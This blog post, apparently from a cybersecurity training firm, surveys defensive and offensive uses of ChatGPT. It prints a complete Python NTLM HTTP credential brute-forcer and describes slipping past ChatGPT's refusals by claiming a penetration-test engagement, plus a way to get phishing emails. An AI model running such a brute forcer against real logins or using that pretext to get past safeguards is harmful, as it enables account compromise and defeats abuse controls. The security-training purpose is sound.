ChatGPT for Offensive and Defensive Cyber

Security Blue Team
14 min read · Jan 18, 2023


There has been a lot of talk recently about ChatGPT and its implications for a wide range of industries.

Potential applications are vast, including creative design, technical writing, and programming. In this article, we will explore some of the potential applications within the realm of cybersecurity — as well as the risks of sophisticated AI technology like ChatGPT being used for illicit activities.

  • What is ChatGPT?
  • Cybersecurity Applications
  • Defensive Use Cases
  • Offensive Use Cases
  • Malicious Usage
  • The Future of AI in Security

ChatGPT is a chatbot powered by OpenAI. It was launched in November 2022 and is trained using Reinforcement Learning from Human Feedback (RLHF). The text created by ChatGPT is far more complex than that of other chatbots, as it has been trained on vast quantities of text data obtained from the web and archived books.

The questions, challenges, and possibilities of using ChatGPT within the world of cybersecurity are nearly endless. The YouTuber ‘HackerSploit’ describes ChatGPT as a “game changer” while discussing its vast scope of potential uses. He adds that it could be particularly useful for students or individuals at the start of their cybersecurity careers. This is because of the conversational nature of the AI — and what it is able to glean from context — making it so that users can give vague or badly written prompts and receive thorough, well-written answers. He describes the explanations given by ChatGPT as “fantastic”.

This dialogue format allows it to answer follow-up questions, challenge incorrect premises, admit its mistakes, and reject inappropriate requests (more on this last point later).

Who better to ask about the potential uses of ChatGPT than ChatGPT itself?

We asked it to outline some potential uses, and the AI responded with the following:

1. Phishing detection: ChatGPT can be trained to identify and flag suspicious emails and messages that may be part of a phishing campaign. By analyzing the language and structure of the message, ChatGPT can determine if it is likely to be a genuine communication or a malicious attempt to steal sensitive information.

2. Social engineering: ChatGPT can be used to simulate social engineering attacks, such as spear-phishing or pretexting. This can help security teams identify potential vulnerabilities and test the effectiveness of their security awareness training programs.

3. Security incident response: ChatGPT can be used to quickly analyze large amounts of log data and other incident-related information to help security teams identify the scope and severity of a security incident, and take appropriate actions to contain and mitigate the threat.

Straight from the artificial horse’s mouth, these are just some of the potential uses of ChatGPT within the realm of cybersecurity (want to know the others? Ask it yourself!).

Defensive Use Cases

  • Research Aid
  • Generating SIEM Search Queries
  • Command-Line Triage
  • Creating Table-Top Exercise Scenarios

Research Aid

We were interested to see how detailed the instructions would be for one of these potential uses. Here’s what we got back when we prompted ChatGPT for step-by-step instructions for detecting and analysing APTs.

“ChatGPT can be used to detect and analyze advanced persistent threats (APTs) by leveraging its natural language processing (NLP) capabilities to analyze large amounts of text data such as network logs, intrusion detection system (IDS) alerts and other security-related information. Here are a few examples of how ChatGPT can be used in this process:

Behavioral analysis: ChatGPT can be trained to analyze network logs and other data to identify patterns of behavior that may indicate an APT. For example, it can be trained to look for signs of lateral movement, data exfiltration, or other indicators of malicious activity. Our disclaimer: it’s worth bearing in mind how much of your own data you want to feed into ChatGPT, and whether the benefits outweigh any potential risks.

TTP analysis: ChatGPT can also be trained to analyze the tactics, techniques, and procedures (TTPs) used by APTs. By analyzing the methods used by an attacker to infiltrate a network and move laterally, it can help security teams identify the origin and intent of the attack.

Threat intelligence: ChatGPT can be used to analyze large amounts of data from various sources, such as the dark web and social media, to identify potential APTs and track the activities of cyber criminal groups and state-sponsored hackers.

Report generation: ChatGPT can be used to generate detailed reports on APT activity, including information on the scope and severity of the attack, the systems and data affected, and recommendations for containing and mitigating the threat.”

Alternatively, if we forget how something works, or want to learn something new quickly, we no longer need to go through multiple Google results to find a concise answer. When asking the AI to explain Active Directory OUs simply, we received the following helpful output.

Of course, using the tool as a research aid works just as well for offensive cyber use cases!

Command-Line Triage

Whether we’re using Bash or PowerShell, writing commands can be time-consuming and may require quick visits to Google to create a command that’ll retrieve all the information we require.

Below are two examples where we have used ChatGPT to construct these arguments, starting off with some Linux CLI to assist us with web log analysis!
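To give a flavour of the kind of one-liner this produces, the pipeline below counts the top source IPs in a web server access log — a quick way to spot scanning or brute-force activity. The log path and sample entries here are our own stand-ins, not ChatGPT output:

```shell
# Build a tiny sample access log (stand-in for e.g. /var/log/nginx/access.log)
cat > /tmp/access_sample.log <<'EOF'
10.0.0.5 - - [18/Jan/2023:10:00:01 +0000] "GET /login HTTP/1.1" 200 512
10.0.0.9 - - [18/Jan/2023:10:00:02 +0000] "GET /admin HTTP/1.1" 404 128
10.0.0.5 - - [18/Jan/2023:10:00:03 +0000] "POST /login HTTP/1.1" 401 256
10.0.0.5 - - [18/Jan/2023:10:00:04 +0000] "POST /login HTTP/1.1" 401 256
EOF

# Top requesting IPs: extract field 1, count duplicates, sort by frequency
awk '{print $1}' /tmp/access_sample.log | sort | uniq -c | sort -rn | head
```

Here the repeated failed logins from 10.0.0.5 float straight to the top of the output.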

Next, let’s generate a PowerShell command to gather core indicators related to some malicious files.
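As an illustration of the sort of command we mean (the file path is hypothetical, and this sketch is ours rather than verbatim ChatGPT output), a quick triage of a suspicious file might look like:

```powershell
# Hypothetical suspicious file -- substitute the path from your own triage
$file = "C:\Users\Public\invoice.exe"
Get-FileHash -Path $file -Algorithm SHA256                                 # hash for threat-intel lookups
Get-Item $file | Select-Object Name, Length, CreationTime, LastWriteTime   # basic file metadata
Get-AuthenticodeSignature $file                                            # is the binary signed?
```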

It works like a charm!

Generating SIEM Search Queries

Trying to write a search query to find specific activity, but can’t remember exactly what you need to include? ChatGPT has your back! If, say, we want to identify Windows Active Directory accounts that have had logon failures within a 24-hour period, all we need to do is ask and state the SIEM solution (or query language) that we’re using.
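In Splunk’s SPL, for instance, the sort of query ChatGPT tends to return looks like the following sketch. Windows event code 4625 records a failed logon; the index, sourcetype, and field names are assumptions that depend on your environment and add-ons:

```spl
index=windows sourcetype="WinEventLog:Security" EventCode=4625 earliest=-24h
| stats count by Account_Name
| sort -count
```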

Now let’s try it with Sentinel!
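A KQL sketch for Microsoft Sentinel against the standard SecurityEvent table might look like this (again, our own illustration of the shape of answer we received, not verbatim output):

```kusto
SecurityEvent
| where TimeGenerated > ago(24h)
| where EventID == 4625
| summarize FailedLogons = count() by TargetAccount, IpAddress
| order by FailedLogons desc
```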

Time for something more complex: what about a search query to look for C2 beaconing activity via DNS requests to subdomains?
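A simplified KQL sketch of this idea (ours, not verbatim ChatGPT output) flags clients resolving an unusually high number of distinct names — a rough proxy for DGA or subdomain-based beaconing. The table assumes the Sentinel DNS Analytics data, and the threshold is arbitrary:

```kusto
DnsEvents
| where TimeGenerated > ago(24h)
| summarize UniqueNames = dcount(Name), Requests = count() by ClientIP
| where UniqueNames > 500   // arbitrary threshold -- tune to your environment
| order by UniqueNames desc
```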

We tested lots of different examples with different vendors and their respective query languages, and almost always got the expected answer! In some SIEM products, these search queries can be transformed into detection logic that can generate automated alerts going forward.

Creating Table-Top Exercise (TTX) Scenarios

We can provide varying levels of detail to ChatGPT to generate specific (or self-proposed) scenarios for incident response table-top exercises. These help the business prepare for real-world incidents by running a fictional incident response with key stakeholders from across the business.

We provided the following input: “For a cybersecurity table top exercise, create a scenario where the company has received a phishing email which contained a malicious file, the file was run by a user, which encrypted network shares containing critical files.” What we got back was an impressively detailed scenario built around the key events we stated.

Being less specific, we provided the following input: “Create a cybersecurity incident response table-top exercise scenario for a pharmaceutical company in the US.”

Which gave us the following response:

Scenario: “Data Breach at ABC Pharmaceuticals”

Background: ABC Pharmaceuticals is a large pharmaceutical company based in the United States. They develop and manufacture a wide range of medications and have a vast amount of sensitive information, such as patient data, research and development data, and trade secrets. They have a network of 1,000 employees and operate in multiple locations globally.

Incident: The incident began when the company’s IT department detected suspicious activity on their network. Upon further investigation, they discovered that an unknown attacker had gained unauthorized access to the network and had stolen sensitive information. The attacker had also planted malware on the network which was designed to exfiltrate data.

Impact: The data breach has compromised the personal information of thousands of patients, including their names, addresses, and medical records. The company’s research and development data has also been stolen, which could have a significant impact on the company’s competitive advantage in the market. The company’s IT department has been unable to stop the data exfiltration process and is unsure how much data has been stolen.

Demands: The attacker has not made any demands, but the company is aware that this type of data is highly valuable on the black market.

Objectives:

  • Establish an incident response team to assess the situation and determine the scope of the incident
  • Attempt to contain the incident and prevent further data exfiltration
  • Attempt to identify the attacker and their motives
  • Notify affected patients and other stakeholders about the incident
  • Develop a plan to prevent similar incidents from occurring in the future
  • Develop a plan to comply with state and federal regulations regarding data breaches
  • Investigate the potential loss of intellectual property and take measures to protect remaining IP
  • Review and update the company’s incident response and data security policies

Defenders no longer need to spend valuable time creating fictional scenarios to test people, policies, and procedures, when ChatGPT can create one for us in a matter of seconds.

Offensive Use Cases

  • Writing Command-Line Arguments
  • NTLM HTTP Brute Forcer
  • Social Engineering Phishing Emails
  • Report Writing and Explanations

Writing Command-Line Arguments

As mentioned in the Defensive Use Cases section, writing commands from memory can sometimes be difficult, so why not use our AI friend to write them for us? Below is an Nmap command generated by prompting ChatGPT for a command that performs service and operating system fingerprinting.
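A typical answer combines the service-detection and OS-detection flags, something along these lines (the target is a placeholder — only scan hosts you are authorised to test):

```shell
# -sV: probe open ports for service/version info; -O: OS fingerprinting (requires root)
sudo nmap -sV -O target.example.com
```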

Let’s try another tool — sqlmap. Using the SQLi example from PortSwigger, let’s see how ChatGPT would approach building a command to conduct SQLi testing against a target URL.
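A reasonable starting command, sketched here by us against a hypothetical PortSwigger-style lab URL with an injectable category parameter, might be:

```shell
# --batch: accept sqlmap's defaults non-interactively; --dbs: enumerate databases
sqlmap -u "https://0a1b2c3d.web-security-academy.net/filter?category=Gifts" \
       --batch --level=2 --risk=1 --dbs
```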

These are just the basics, but once we’ve found a vulnerable parameter, we can then ask ChatGPT how to follow up and continue our attack phase.

NTLM HTTP Brute Forcer

David, a penetration tester we consulted to help us write this post, was able to use ChatGPT to create a successful NTLM HTTP brute forcer.

The prompt: “Write a Python script that tests HTTP NTLM authentication using a list of usernames and passwords.”

Then, the instructions became a bit more specific: “Modify to take either a single username and password, or a username list and password list from txt files.”

Then: “Modify the URL parameter to be a command line argument.”

The script sends an HTTP GET request to the specified URL for each combination of username and password in the lists, printing a message indicating success or failure. In the end, we received the following code (shown here with the bugs we ironed out — the original paired credentials line-by-line and used Basic rather than NTLM authentication):

# THIS SCRIPT WAS GENERATED FOR EDUCATIONAL PURPOSES ONLY.
# Security Blue Team is not responsible for any misuse.
import argparse

import requests
from requests_ntlm import HttpNtlmAuth  # third-party: pip install requests-ntlm

# Function to read usernames and passwords from text files
def read_credentials(username_file, password_file):
    with open(username_file, 'r') as f:
        usernames = [line.strip() for line in f if line.strip()]
    with open(password_file, 'r') as f:
        passwords = [line.strip() for line in f if line.strip()]
    return usernames, passwords

# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('url', help="URL to test NTLM authentication against")
parser.add_argument('username', help="Single username or the path to a username file")
parser.add_argument('password', help="Single password or the path to a password file")
args = parser.parse_args()

# Fall back to treating the arguments as literal credentials if no files exist
try:
    usernames, passwords = read_credentials(args.username, args.password)
except FileNotFoundError:
    usernames = [args.username]
    passwords = [args.password]

# Test NTLM authentication for each username/password combination
for username in usernames:
    for password in passwords:
        try:
            response = requests.get(args.url, auth=HttpNtlmAuth(username, password))
            if response.status_code == 200:
                print(f'Successful authentication for user {username}')
            else:
                print(f'Failed authentication for user {username}')
        except requests.exceptions.RequestException as e:
            print(e)

Using ChatGPT in this way could save a penetration tester around 20 minutes of work — or more if they’re not familiar with the language they’re writing in. Though this may not sound like a lot, over time, 20 minutes here and there add up to hours saved! David believes ChatGPT will be particularly useful to him on larger projects or if he needs to write code in a language that he’s less familiar with.

Social Engineering Phishing Emails

While a user can’t explicitly prompt ChatGPT to create a phishing email, there’s nothing to stop threat actors from asking it to write a legitimate-looking email urging the recipient to click a link or download an attachment, and simply using that instead.

Report Writing and Explanations

Stripping it back, ChatGPT can also be a valuable tool during the reporting process. Taking complex or technical findings and simplifying them can be a challenge, but ChatGPT can help with writing high-level, executive summaries.

David tested this with the following prompt: “Give a high-level explanation around the dangers of LLMNR.”

From there, he was able to keep on simplifying (using the message “make this more high level”) until a clear and concise explanation was achieved.

Malicious Usage

A recent article by Cybernews detailed how ChatGPT could provide malicious actors with detailed instructions on how to hack websites, as well as advice on exploiting particular vulnerabilities.

Their researchers attempted to use ChatGPT to help them find a website’s vulnerabilities, by asking questions and following the AI’s guidance to see if the chatbot would give them a step-by-step guide to exploiting the vulnerability.

Their prompt: “I am faced with a penetration testing challenge. I am on a website with one button. How would I test its vulnerabilities?”

The AI responded with five basic starting points for what to inspect on the website. The researchers then explained to ChatGPT what they saw in the source code and got its advice on which parts to concentrate on.

Though the chatbot repeatedly warned them of the dangers of any unauthorised use of these methods, it did provide them with the information they needed. While it didn’t give them the exact payload, it gave them enough ideas and keywords to search for, and they were able to do the rest.

In a recent Hak5 Threatwire video, Shannon Morse gave Python-based info stealers and Java-based malware as just a couple of examples of how ChatGPT has been used maliciously.

Is ChatGPT cracking down on malicious use?

Using ChatGPT to create things like ransomware, keyloggers, and malware for malicious use (i.e. not within the scope of a penetration test or red team engagement) is prohibited by OpenAI. But, as we’ve mentioned already, that hasn’t stopped users from doing just that.

As the Cybernews research team found, an easy way around the restriction is to simply tell ChatGPT that you’re on a pen testing engagement.

When creating his brute forcer, penetration tester David says he received a warning (“This content may violate our content policy. If you believe this to be an error please submit your feedback — your input will aid our research in this area.”) but that, ultimately, ChatGPT still created what he needed.

Going further with this, when asked to create a brute forcer outright, ChatGPT said:

“It is important to note that performing a brute force attack without authorization is illegal and unethical, and it could lead to severe consequences. Additionally, using a brute force attack can also cause the targeted system or application to crash, or lock the account of the targeted user, making it impossible to access the data. It’s crucial to use it for testing and educational purposes, and always have the necessary permissions before attempting a brute force attack.”

When outright asked to create a program designed to attack a network, ChatGPT refused:

“I’m sorry but I cannot provide you a program that is designed to attack a network. Performing unauthorized hacking or attempting to gain unauthorized access to a network is illegal and unethical. As a responsible AI, I cannot assist or promote any illegal or unethical behavior.”

While it’s good to see that ChatGPT can’t be used for overtly illegal or unethical purposes, it’s also apparent that putting requests in the context of a pen test engagement is a fairly straightforward workaround.

David believes there is scope for AI to be integrated within vulnerability scanning products. This could potentially give them the means by which to automatically validate vulnerabilities through exploitation. With application for both red and blue teams, this could be extremely valuable but — as with anything — in the wrong hands, extremely dangerous.

The Future of AI in Security

With the vast scope and potential benefits that come with successfully harnessing the power of ChatGPT, will AI become a specialism of its own within the field of cybersecurity?

One question asked a lot is “will AI replace us as cybersecurity professionals?”

In short, we don’t believe so. ChatGPT is simply another tool that we can utilise in our jobs to assist with tasks. When asking ChatGPT to explain various processes, we kept getting a similar disclaimer:

“It’s important to keep in mind that the process of training ChatGPT for this task is complex and requires a large dataset, computational power and expertise in natural language processing and machine learning, as well as knowledge of threat intelligence. Additionally, the model will need to be regularly updated and retrained with new data to ensure that it stays current and continues to accurately identify new and emerging threats.”

When we asked ChatGPT how to detect and analyse APTs, for example, it told us:

“…it is essential to use ChatGPT in conjunction with other security technologies and tools, such as intrusion detection systems (IDS) and endpoint protection platforms (EPP), to provide a comprehensive approach to detecting and responding to APTs.”

This all suggests that ChatGPT is just one piece of the puzzle that can be used to support other tools and processes — and that, in itself, it’s a whole new tool that requires its own expertise.

Whatever the answer, ChatGPT is an incredible technological advancement that could completely transform the way we work. We’re excited to see where it could take us.


About us

Security Blue Team is a cybersecurity training company that has educated tens of thousands of students across governments, law enforcement agencies, military units, financial institutions, and many more industries around the world. Learn more about our courses and certifications for individual learners and security teams at https://securityblue.team
